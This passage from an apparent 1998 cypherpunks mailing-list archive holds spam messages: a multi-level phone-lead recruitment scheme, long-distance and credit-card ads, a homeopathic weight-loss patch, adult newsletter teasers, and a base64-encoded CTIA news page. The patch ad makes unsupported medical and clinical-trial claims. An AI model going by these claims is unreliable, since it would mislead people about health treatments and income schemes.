$400 in commissions, ($200 will be deducted for a re-entry purchase of
300 phone leads) and start over again in the highest available position
of your sponsor's current matrix.  Bonuses include a FREE Nokia 6160
digital PCS phone with your first check, and 600 minutes of FREE airtime
utilizing the AT&T wireless network ($100 additional deducted from 1st
check).  Thereafter, with every check, you will qualify to receive an
additional 600 minutes of airtime. 
ALL COMMISSION CHECKS ARE CALCULATED DAILY AND SENT WEEKLY VIA OVERNIGHT
DELIVERY!

DOUBLE MATCHING BONUS!
On every cycle after the 1st, you will be in position to qualify for a
double matching bonus on all your personally sponsored, and their
personally sponsored, as they complete their second and third and so on,
cycles.  This will provide an extra incentive for you to work beyond your
current 2 x 2 matrix.

FAST FACTS ON THE NOKIA PHONE AND THE AT&T ONE RATE PLAN.
***** The phone:
Nokia 6160 Dual Band phone that works in both analog (cellular) and
digital areas.
Features include slim design (6oz.) and a minute minder to keep track of
your minutes used.

Free battery and charger included.
For more information hit REPLY and type  _________ in the subject box





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pooppido@fffff.net
Date: Tue, 8 Sep 1998 10:14:21 -0700 (PDT)
Subject: Info.
Message-ID: <199809081714.KAA13329@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 THAT'S 5 cents per minute!!!

         SPECIAL PROMOTION - Limited Time Only!

 Between NOW and September 30th
 You Can Receive:
 5 per minute state to state!!
 9 per minute within the state!!
 5 per minute to selected International Countries!!
 5 per min to these selected international destinations:
 CANADA, BELGIUM,  AUSTRALIA, GERMANY, 
 FRANCE, NETHERLANDS, NEW ZEALAND, 
 SWEDEN, THE UNITED KINGDOM

          THAT'S  5 cents per minute!!!
 
PLUS A FREE PRE-PAID CALLING CARD AFTER YOU SIGN UP!!!!          
       
 

TO START SAVING IMMEDIATELY AND TAKE 
 ADVANTAGE OF THIS LIMITED TIME PROMOTION
 RESPOND BY E-MAIL to :  rha@s-tuff.com 

How do You ...SAVE! On your long distance phone bill!!! 

      11 year-old Telecommunications GIANT 
           Can Help You Save  UP TO 30% 
                OVER AT&T & SPRINT!
                       Permanently!!!

 In fact, NO ONE can beat our International Rates!
 And now we are taking domestic long distance by 
 storm!!

After September 30, 1998 rates are just...
           7 per minute State-to-State*
                   
           9 per minute Within the state 
                      24 hrs. a day
                     7 days a week. 
                    Unlimited calls! 
                      Guaranteed!
         No minimum usage requirements! 
         No separate Phone Bills! (Charges will be 
         included on the long distance
         portion of your local phone bill, so that you can
         pay with a single check. 
        
         INCREDIBLY LOW INTERNATIONAL RATES! 

        SAMPLE INTERNATIONAL RATES
            (Our rates are effective August 1, 1998 )      
                          
                        CAN YOU BELIEVE IT!       
         **Only 7 cents per min to and from:  
 Puerto Rico, Guam, Canada, Hawaii and Alaska!!

                            OUR RATE    AT&T ONE RATE 
 COUNTRY            PER MIN.      INTERNATIONAL                  
 Brazil .                     .46                    .55
 China                        .63                    .80 
 Cuba                         .64                    .84 
 France .                     .14                    .33
 Germany                      .14                    .33
 Hong Kong                    .24                    .61
 Italy                        .23                    .35 
 Japan                        .26                    .35
 Philippines                  .49                    .77  
 South Korea                  .35                    .39
 Taiwan, Rep China            .35                    .46         
 India                        .67                    .80
 UK                           .09                    .12   
 Mexico City                  .29                     N/A     
               
 and many, many more!   

                    OUR NETWORK

 Brought to you by a global long distance company 
 with a high-tech fiber optic network that provides 
 the high-quality crystal clear telecommunications
 you've come to expect. 

 We operate a 35,000 mile fiber optic backbone in 
 the U.S., which interconnects its switches and provides
 the company access to every LATA in the country. In
 Canada, We operate a fiber-optic network that 
 interconnects its switches and provides the company 
 access to the provinces of British Columbia, Ontario
 and Quebec. 

 We maintain switching hubs in major cities throughout
 North America, including Atlanta, Chicago, Dallas, 
 Honolulu, Los Angeles, Miami, Montreal,New York, 
 Ottawa, San Francisco, Seattle, Toronto, Washington
 and Vancouver. Our global network uses fiber optics
 and 100% digital transmission for unsurpassed reliability
 and superior quality. We are continually extending the 
 network backbone around the world. Our customers 
 enjoy crystal clear connections to virtually every direct
 dial destination world-wide. 

           OUR CUSTOMER SERVICE

 We provide multi-lingual customer service and 
 support, including Spanish, French, Chinese
 (Mandarin & Cantonese), all available 24 hours a day, 
 7 days a week.  

    SPECIAL PROMOTION - Limited Time Only!

 Between August 1st and September 30th
 You Can Receive:
 5 per minute state to state!!
 9 per minute within the state!!
 5 per minute to selected International Countries!!
 5 per min to these selected international destinations:
 CANADA, BELGIUM,  AUSTRALIA, GERMANY, 
 FRANCE, NETHERLANDS, NEW ZEALAND, 
 SWEDEN, THE UNITED KINGDOM

          THAT'S  5 cents per minute!!!
                  
 TO START SAVING IMMEDIATELY AND TAKE 
 ADVANTAGE OF THIS LIMITED TIME PROMOTION
 RESPOND BY E-MAIL  to : rha@s-tuff.com 

 

 WE DARE YOU TO COMPARE US TO YOUR
 PRESENT CARRIER!  Get the Facts Now! 
 Contact Us Immediately for more information. 
email : rha@s-tuff.com

Agents needed ...your commissions start at 10% and go as high as 
19%.
 
RESPOND BY E-MAIL  to : cool5cents@yahoo.com 

PENBELL COMMUNICATIONS
6001 Skillman Suite 102
Dallas, TX. 75231
214-750-4738


 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Merchant Services <chargeit6@usa.net>
Date: Tue, 8 Sep 1998 20:29:05 -0700 (PDT)
To: Merchant Accounts <rryan3760@aol.com>
Subject: CREDIT CARD PROCESSING
Message-ID: <199809081528.LAA11834@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


---------------------------------------------------------
We received your email as someone who might be interested
in our services. If this was a mistake please email us
with "remove in the subject line" 
---------------------------------------------------------

Dear Friend,

How would you like to be able to accept credit cards
directly from your website, telephone or fax for your
products and services and never need to purchase or lease
expensive credit card equipment or pay a monthly 
fee for online ordering capabilities?

**Brand New** Telecharge Credit Card acceptance program 
allows you to accept VISA or Mastercard any TIME,any WHERE 
through phone, fax or internet without the need to purchase 
or lease expensive credit card equipment. This brand new 
program will allow you to accept credit cards tomorrow.
You simply pick up your telephone, dial a special toll free
800# 24 hrs a day 7 days a week, input a passcode and the
credit card # and receive an immediate authorization over the phone.
Within 2 days the money will be in your bank account. This is
an exciting program for all businesses. Before you spend any money
on a credit card program LOOK at this new program! 
To have a representative call you to explain the details of this
program please email your Name, Phone Number (Don't forget your area code)
and best time to call to:

mailto:chargeit6@usa.net  

A representative will  return your call within 24hrs. 
A 100 % approval rate. This is a special promotion 
and for a limited time. Start today and save an additional 36%. 
Also receive 6 months of online advertising absolutely FREE!
for your business.

Feel free to call us and leave a message. A representative will return
your call within 24hrs.
World Tech Inc.
818-718-9429
7210 Jordan Ave.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dietpatches@bigfoot.com
Date: Tue, 8 Sep 1998 14:51:35 -0700 (PDT)
Subject: New! All Natural Weight Loss "Patch"!
Message-ID: <eaep.3.0.reg.BonGTT.36046.7272935185@avenel.CASLINK.com>
MIME-Version: 1.0
Content-Type: text/plain



Do you know anyone that needs to lose weight?

Of course you do! There are over 92 million overweight people in the US alone. The weight-loss 
industry brings in billions of dollars each year.  A recent Harris poll indicated that 74% of Americans 
are overweight or would like to lose a few pounds.

THE ALL NATURAL WEIGHT LOSS PATCH

Just introduced in May, 1998, the All Natural TrimPatch is the most significant development in the 
industry.  The patch suppresses appetite, naturally.  100% homeopathic ingredients, with time 
released nutrients that enter the bloodstream through the skin.  Just peel and stick.  Four years in 
development.  87% of people lost weight in clinical studies.  60 Medical Doctors and Pharmacists on 
advisory board.  No shakes or drinks, no pills, no special menus.

THE PRODUCT:

The transdermal weight loss patch, call "All Natural TrimPatch" is a simple, safe and sensible way to 
lose and control weight.  It is completely homeopathic, with time-released nutrients that enter the 
bloodstream through the skin.  Transdermal is the third most effective way to introduce a substance 
to the body, after intravenous and sub-lingual.  TrimPatch works by suppressing an person's 
appetite and increasing fat metabolism.  It has NO stimulants.  Simply Peel, Stick, and Forget!

TESTING:

The product was tested over 2 years on 2,400 people with an 87% success rate.  It was overseen 
by 60 MD's in consultation with many Homeopaths.  There were no side effects in the entire study, 
other than a slight minor rash from the adhesive on some people, which left in 24 hours.  Double 
blind placebo test methods were used.  Over 900 MD's were on the Manufacturer's Advisory Board.  
There are 60 Medical Doctors and pharmacists who have been active in the clinical studies of the 
patch.

PRODUCT EFFECTIVENESS:

The average weight loss was 3 lbs. after 2 weeks, 8 lbs. after 4 weeks, and 13 lbs. after 6 weeks.

GURARANTEED RESULTS BY THE COMPANY:

All Patches come with a 30 day, 100% money back guarantee. 

MARKET:

Weight loss is a $33 billion dollar a year industry. Think about it. How many people do you know 
personally who'd like to be trim? With the recent withdrawal of Redux & Phen-Fen from the 
market, people want a SAFE product to help them balance their weight.  More than a third of the 
American population is overweight. 53 million people are considered "obese." A Harris Poll 
(February, 1996) reveals that "74% OF AMERICANS ARE OVERWEIGHT." Our society wants 
something that is easy for them to do. 

Transdermal application industry is rapidly growing. Nicoderm, Vitamin C, Nitro-Glycerin, Estrogen, 
Testosterone, Cortisone, Pain, Morphine, Motion Patches, and Local Anesthetic Patches are 
currently being used.

INGREDIENTS:

Ingredients of The All Natural Trim Patch, and the role they play in balancing our weight naturally:
Abies Canadensis -- Hemlock Spruce - suppresses appetite craving for meat 
Ammonium Bromatum -- Bromide of ammonia - suppresses appetite and headaches 
Ammonium Carbonicum -- Carbonate of ammonia - suppresses appetite 
Ammonium Muriaticum -- (will get the scoop) 
Antimonium Crudum -- Assists in cleansing the body of fat 
Argentum Nitricum -- Nitrate of silver - suppresses appetite for sweets 
Calcarea Carbonica -- Carbonate of lime - suppresses cravings for indigestible food 
Capsicum Annuum -- cayenne pepper - assists in bowel function, elimination 
Cinchona Officinalis -- Peruvian bark from China - enhances digestion 
Fucus Vesiculosus -- Seaweed-based kelp - rejuvenates sluggish thyroid* 
Graphites -- Plumbago - suppresses feeling of hunger in the stomach 
Kali Bichromicum -- Bichromate of potash - enhances digestion 
Kali Carbonicum -- Carbonate of potassium - suppresses desire for sweets 
Kali Phosphoricum -- suppresses desire for sweets 
Lycopodium Clavatum -- Club moss - suppresses excessive hunger Natrum 
Muriaticum -- Chloride of sodium - suppresses appetite 
Phosphorus -- suppresses appetite soon after you eat 
Phytolocca Decandra Berry -- Poke root - assists in killing fungi and their spores 
Pulsatilla -- Wild flower - suppresses appetite for fatty and warm 
foods Sabadilla -- Cevadilla seed - suppresses appetite for sweets 
Silicea -- Pure flint - tendency to create balance in the body 
Spongia Tosta -- Roasted sponge - suppresses excessive hunger 
Staphysagria -- Stavesacre - tendency to increase feeling of strength 
Sulphur -- Sublimated sulphur - suppresses excessive appetite 
Thyroidinum -- suppresses appetite for sweets, rejuvenates sluggish 
thyroid* tends to eliminate nausea and indigestion, thirst for cold water 
Veratrum Album -- White hellspore - suppresses voracious appetite
Thyroid rejuvenation is crucial for increased metabolism of fat, as the thyroid gland controls 
metabolism. An increase in thyroid activity lends itself, therefore, to fat metabolism, as you well know.
This information has been taken from Materia Medica with Repertory, Ninth Edition, published by 
Boericke & Tafel Inc., Santa Barbara, California.

TO PLACE AN ORDER OR TO SPEAK WITH A CUSTOMER SERVICE REPRESENTATIVE 
CALL: (732) 536-5734

FOR INFORMATION ON BECOMING A NATURAL BODYLINES DISTRIBUTOR, CALL: (888) 718-
3175 FOR A 5 MINUTE, 24 HOUR RECORDED MESSAGE.

Email: dietpatches@bigfoot.com

Bonnie Levy
Natural Bodylines
Official Distributor
(732) 536-5734











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joe@printing.com
Date: Tue, 8 Sep 1998 15:37:21 -0700 (PDT)
To: joe@printing.com
Subject: Auto Reply to your message ...
Message-ID: <v04011708b21b5ff96225@[195.5.75.249]>
MIME-Version: 1.0
Content-Type: text/plain


  -----  The following text is an automated response to your message  -----
Thank you for requesting samples of Web Cards.
We will be sending you several samples and a brochure within 24 hours.

Web Cards can be used in so many ways that we've prepared a special free
report on how 50 businesses have used them.  To get your report, simply
send an email to ideas@printing.com and it will be sent to you by email
immediately.

Web Cards are easy to order too.  You can use the on-line form at our Web
Site www.printing.com or print the form and fax it to 908-757-2604 or call
us at 800-352-2333.  We're very helpful and will work with you to adapt
your site to a postcard at no charge.

After setting up your card (which takes about 24 hours), we'll post a
"proof" of what it looks like on the Web and send you the address for you
to approve.  And if you have any changes, don't hesitate, there's no charge
for helping you get exactly what you want.

In the meantime, if you have any questions or would like sample cards for a
specific type of business, please call us at 800-352-2333 or email me at
joe@printing.com.

Sincerely,

Joe Haedrich
President




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jen@evision.nac.net
Date: Tue, 8 Sep 1998 21:34:38 -0700 (PDT)
Subject: PEDIATRIC ADVISE -  FREE WEBSITE
Message-ID: <199809090432.AAA17439@evision.nac.net>
MIME-Version: 1.0
Content-Type: text/plain


If you are a parent you owe it to yourself to visit this site. It is the greatest relief site for all parents. Dr. Paula is the most non judgemental pediatrician I have ever heard of and her site is incredible. Every parent question gets answered usualy within a day. Check it out and please do not be angry that I send you this e-mail. It is only with good intention as I believe this site will be helpfull to you or someone you know.
Visit it at  http://www.drpaula.com
A New Mother.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qimoo@clinet.fi
Date: Tue, 8 Sep 1998 22:13:31 -0700 (PDT)
To: qimoo@clinet.fi
Subject: Advertise! Cheap, Quick & Easy!
Message-ID: <19980908353GAA9500@post.nrcps.ariadne-t.gr>
MIME-Version: 1.0
Content-Type: text/plain




Let A-1 Internet Marketing introduce you to the world of Cyberspace. 

Advertise over the Internet Cheap and Quick.  It's as easy as 1, 2, 3!!

Targeted e-mail is the newest way of advertising.  It only takes a phone call
to place your message in front thousands or even millions of people at a 
price you can't afford to pass up.

Don't wait any longer.  Let's get started now!  Special rates avaiable.


Give us a call toll free.......
                 
                                         ** 1-877-268-8281 **


NOTE:  If this message has reached you in error, we sincerely appologize.  
If you would like to be removed from our mailing list, please call the 800
number listed above and slowly spell and speak your e-mail address so that 
we may process your request promptly.  You will be removed!!  Thank you.                              
ex8




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 9 Sep 1998 14:50:47 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 9, 1998
Message-ID: <199809092038.PAA04335@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



CTIA's Daily News From WOW-COM was not circulated yesterday and today because
of a wireline telephone system failure that is disrupting service to the
Cellular Telecommunications Industry Association building in Washington, D.C. 
We regret the inconvenience this may have caused you and look forward to
resuming the Daily News service as soon as possible. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nokia@mail.kmsp.com
Date: Fri, 11 Sep 1998 09:15:30 -0700 (PDT)
To: Friend@public.com
Subject: Eliminate your present phone bill......
Message-ID: <199809092110.CAA24580@shakti.ncst.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


A FREE Nokia 6160 digital PCS phone that covers the 50 United States 
including Alaska and Hawaii and 600 FREE minutes of airtime utilizing
the AT&T wireless network with No roaming or Long Distance charges!
Eliminate your current phone bill forever as you continue to receive free airtime.

Nokia 6160 digital PCS phone sent
via Federal Express direct from AT&T.

Listen to our 3 Minute recorded Presentation regarding this Free Nokia Phone
offer at 1-888-834-5017 or 1-888-248-6031
Pull up the Fax-on-Demand at 1-716-720-2299

Not only can you get a FREE Nokia 6160 phone, you can receive residual income that allows the sky to be the limit as
far as your future income is concerned.
Need more information: 
listen to our 24hr recorded conference call at 1-212-796-6870

To get started after listening to the 3 minute message, you will need the following information:
Sponsor ID:  22-1569104
Sponsor Phone: 1-800-636-6773 ext 4533
Let me know if you decide to join so I can help you receive your FREE phone by next week.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 9 Sep 1998 13:39:25 -0700 (PDT)
To: (STUFFED WEDNESDAY SEPTEMBER 9 1998)
Subject: The full Monica: Novel new 'service'/Collectors' issue - New interface tomorrow
Message-ID: <19980909172510.14118.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Today is the last day using the current interface. After
much research we designed a new front end along the lines
of what many of you had been asking for. And it's turned
out to be super-fast too. That's tomorrow's issue. But for
today, here's what you also get!

+ 30+ FREE HI-RES JPEGS
 + PAGE 2 'SPREAD': A GORGEOUS GAL
  + RAUNCHY RECIPE: CRAFTY COOK
   + LA WINDSKY: AMAZING MODEL
    + KEEP IT IN THE FAMILY: STRANGE ENCOUNTER
 + CLINTON CONDOMS: YES IT'S TRUE
  + ASS-PIRIN: SEX AND DRUGS
   + WILD THUMBNAILS: 10 FREE PICS
    + SEXY STORY: "THE GROUPIE"
     + THE VERY BEST OF EUREKA! - YOUR FAVORITE SITES
  + SEXY SURPRISE THUMBS: 10 MORE FREE PICS 
   + FOOD FOR SEX: FASCINATING FEATURE
    + MEGA THUMBNAIL ORGY: ANOTHER 10 FREE PICS
     + ULTRA HI-RES POSTER PIC: SAVE IT, PRINT IT
      + LOADS AND LOADS MORE STUFF: CHECK IT OUT!

- Have fun!

       ---->   http://stuffed.net/98/9/9/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/9/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jrjeffro@aol.com
Date: Wed, 9 Sep 1998 19:18:46 -0700 (PDT)
Subject: No Subject
Message-ID: <199809100227.TAA19261@emke.com>
MIME-Version: 1.0
Content-Type: text/plain


HaCkaZ OnlY Da EliTe

HelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR LeeTo K 
Pe@CE FrOmE The LeeTs HacK
JeFFrO)
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 10 Sep 1998 08:40:02 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 10, 1998
Message-ID: <199809101601.LAA02273@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM. Please click on the icon / attachment
for the most important news in wireless communications today.

The future of your company will be announced
October 12 @ Wireless I.T.  Will you be there?

CLICK HERE NOW TO SIGN UP AND SAVE
http://www.wirelessit.com/portal.htm 

Team WOW-COM
wowcom@ctia.org
===========================================
 




--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00014.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00014.bin"
Content-Description: "_CTIA_Daily_News_19980910a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDEwLCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgU2F5cyBC
TEFTVCBUZWNobm9sb2d5CldpbGwgQWxsb3cgV2lyZWxlc3MgU2VydmljZXMg
VG8gQ29tcGV0ZSBXaXRoIFdpcmVkIFNlcnZpY2VzPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkx1Y2VudCBjbGFpbXMg
dGVuIGZvbGQgaW5jcmVhc2UgaW4gd2lyZWxlc3MKdHJhbnNtaXNzaW9uIGNh
cGFjaXR5LiAoPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0aXZlLndzai5jb20v
YXJ0aWNsZXMvU0I5MDUzNTA2ODE1ODA1MzU1MDAuaHRtIj5XU0o8L0E+KSZu
YnNwOwooPEEgSFJFRj0iaHR0cDovL3d3dy53aXJlZC5jb20vbmV3cy9uZXdz
L3RlY2hub2xvZ3kvc3RvcnkvMTQ5MDIuaHRtbCI+V0lSRUQ8L0E+KS48L0ZP
TlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9KzE+R2xvYmFsU3RhciBTYXRlbGxpdGVzCkRlc3Ryb3llZCBpbiBSdXNz
aWFuIExhdW5jaDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5Ud2VsdmUgc2F0ZWxsaXRlcyBsb3N0IGluIHJvY2tldCBl
eHBsb3Npb24uCig8QSBIUkVGPSJodHRwOi8vd3d3LnRhbXBhYmF5b25saW5l
Lm5ldC9uZXdzL25ld3MxMDEzLmh0bSI+VEFNUEE8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5C
ZWxsIEF0bGFudGljIE1vYmlsZQpBbm5vdW5jZXMgRGlnaXRhbCBPbmUgUmF0
ZSBQbGFuIEZvciBXaXJlbGVzcyBDdXN0b21lcnM8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RmxhdCByYXRlIHByaWNp
bmcgcGxhbiBzZWVuIGFzIG1lZXRpbmcKY29tcGV0aXRpb24uJm5ic3A7IEJB
TSBvZmZlcnMgcmF0ZSBmb3IgbG93ZXIgZW5kIGN1c3RvbWVycy4mbmJzcDsg
KDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9m
ZXNzaW9uYWwvbmV3cy9ib2R5X25ld3MuY2ZtP05FV1NfSUQ9MzQwMyI+V09X
LUNPTTwvQT4pCig8QSBIUkVGPSJodHRwOi8vd3d3Lndhc2hpbmd0b25wb3N0
LmNvbS93cC1zcnYvd2FzaHRlY2gvZGFpbHkvc2VwdDk4L2JlbGwwOTEwOTgu
aHRtIj5XQVNIUE9TVDwvQT4pCig8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3Rp
dmUud3NqLmNvbS9hcmNoaXZlL3JldHJpZXZlQDIuY2dpP2N0aWFwL3RleHQv
d3NqaWUvZGF0YS9TQjkwNTMwNDg0MzcwNDk2NTUwMC5kam0vJk5WUD0mdGVt
cGxhdGU9c2VhcmNoLWh1Yi1hcnRpY2xlcy50bXBsJmZvcm09c2VhcmNoLWh1
Yi1hcnRpY2xlcy5odG1sJmZyb20tYW5kPUFORCZ0by1hbmQ9QU5EJnNvcnQ9
QXJ0aWNsZS1Eb2MtRGF0ZStkZXNjJnFhbmQ9QU5EJmJvb2xfcXVlcnk9QmVs
bCtBdGxhbnRpYyZkYm5hbWU9JTI2bmFtZTElM0RkYm5hbWUlMjZuYW1lMiUz
RGRibmFtZSUyNm5hbWUzJTNEZGJuYW1lJmxvY2F0aW9uPWFydGljbGUmcGVy
aW9kPSUzQTAlMjZkYXRlJTNEZGF0ZSZmcm9tPTA5LzA5LzE5OTgmdG89MDkv
MDkvMTk5OCZIST00Ij5XU0o8L0E+KSZuYnNwOzwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Fcmljc3Nv
biBUbyBBY3F1aXJlIEFkdmFuY2VkCkNvbXB1dGVyIENvbW11bmljYXRpb248
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
RXJpY3Nzb24gdG8gcGF5ICQyODUgTWlsbGlvbiBmb3IgY29tcHV0ZXIKbmV0
d29yayBwcm9kdWN0IGNvbXBhbnkuICg8QSBIUkVGPSJodHRwOi8vaW50ZXJh
Y3RpdmUud3NqLmNvbS9hcnRpY2xlcy9TQjkwNTM1NzQwMTkzMTYzMjUwMC5o
dG0iPldTSjwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPklyaWRpdW0gV2lsbCBEZWxheSBTYXRl
bGxpdGUKVGVsZXBob25lIGFuZCBEYXRlIFNlcnZpY2U8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q29tcGFueSB3aWxs
IGJlZ2luIHRyaWFsIHNlcnZpY2UgaW4gU2VwdGVtYmVyCmFuZCBhaW1zIGZv
ciBmdWxsIGxhdW5jaCBpbiBOb3ZlbWJlci4gKDxBIEhSRUY9Imh0dHA6Ly93
d3cud2FzaGluZ3RvbnBvc3QuY29tL3dwLXNydi93YXNodGVjaC9kYWlseS9z
